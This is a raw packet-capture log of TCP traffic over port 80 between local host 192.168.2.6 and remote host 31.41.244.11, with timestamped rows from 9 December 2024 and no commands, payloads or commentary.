                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.544647932 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.636436939 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.636451006 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.636615038 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.636770010 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.636825085 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.637578011 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.637630939 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.637758970 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.637800932 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.639548063 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.639559031 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.639590025 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.641791105 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.641840935 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.641959906 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.642003059 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.643776894 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.643790007 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.643816948 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.643837929 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.646140099 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.646186113 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.646239042 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.646276951 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.648590088 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.648601055 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.648638964 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.648648977 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.650449991 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.650495052 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.650630951 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.650671959 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.652868986 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.652879953 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.652914047 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.652921915 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.654803991 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.654856920 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.655004025 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.655050039 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.656965017 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.657016039 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.657099962 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.657147884 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.659389973 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.659399986 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.659432888 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.661391973 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.661443949 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.661971092 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.662025928 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.663712025 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.663727999 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.663762093 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.663781881 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.666007996 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.666044950 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.666193008 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.666239023 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.668229103 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.668277979 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.668296099 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.668346882 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.670478106 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.670488119 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.670526981 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.671857119 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.671905041 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.672032118 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.672075987 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.673443079 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.673485994 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.673614979 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.673655033 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.675044060 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.675088882 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.675225019 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.675270081 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.676564932 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.676610947 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.676734924 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.676776886 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.679589987 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.679631948 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.679652929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.679686069 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.679706097 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.679742098 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.679873943 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.679914951 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.681449890 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.681495905 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.681787968 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.681830883 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.683047056 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.683090925 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.683180094 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.683218956 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.684617043 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.684665918 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.684686899 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.684730053 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.686060905 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.686106920 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.686161995 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.686203003 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.687683105 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.687742949 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.687807083 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.687855959 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.689265013 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.689316034 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.689337969 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.689379930 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.690937996 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.690985918 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.691004038 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.691041946 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.692465067 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.692512989 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.692536116 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.692583084 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.694123983 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.694169044 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.694220066 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.694262981 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.695662975 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.695712090 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.695743084 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.695782900 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.697232962 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.697289944 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.697360039 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.697412968 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.698856115 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.698909998 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.699026108 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.699073076 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.700440884 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.700489998 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.700508118 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.700557947 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.701988935 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.702037096 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.702088118 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.702143908 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.703702927 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.703752995 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.703897953 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.703937054 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.705152988 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.705199957 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.705275059 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.705316067 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.706782103 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.706825972 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.706886053 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.706923962 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.708381891 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.708431005 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.708470106 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.708512068 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.709969044 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.710022926 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.710087061 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.710133076 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.711591959 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.711647034 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.711703062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.711749077 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.713315010 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.713493109 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.713500977 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.713542938 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.714737892 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.714778900 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.714876890 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.714943886 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.716420889 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.716468096 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.716496944 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.716533899 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.717998028 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.718043089 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.718158960 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.718198061 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.719523907 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.719559908 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.719568968 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.719602108 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.721142054 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.721185923 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.721282959 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.721318007 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.722734928 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.722780943 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.722852945 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.722899914 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.724299908 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.724345922 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.724416971 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.724457979 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.725877047 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.725919008 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.725930929 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.725972891 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.727524996 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.727566957 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.727690935 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.727737904 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.827652931 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.827667952 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.827742100 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.828062057 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.828109026 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.828133106 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.828176022 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.829524994 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.829566956 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.829591036 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.829636097 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.830853939 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.830894947 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.830980062 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.831024885 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.832210064 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.832252979 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.832323074 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.832364082 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.833611012 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.833657980 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.833678007 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.833722115 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.835102081 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.835145950 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.835165024 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.835206032 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.836384058 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.836427927 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.836446047 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.836483955 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.837657928 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.837699890 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.837740898 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.837780952 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.839039087 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.839075089 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.839215994 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.839260101 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.840293884 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.840351105 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.840395927 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.840437889 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.841590881 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.841631889 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.841741085 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.841789007 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.842912912 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.842953920 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.842992067 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.843033075 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.844224930 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.844269037 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.844424009 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.844466925 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.845639944 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.845681906 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.845745087 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.845788002 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.846920967 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.846961021 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.846980095 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.847023964 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.848221064 CET804985931.41.244.11192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.848263979 CET4985980192.168.2.631.41.244.11
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:10.848356009 CET804985931.41.244.11192.168.2.6
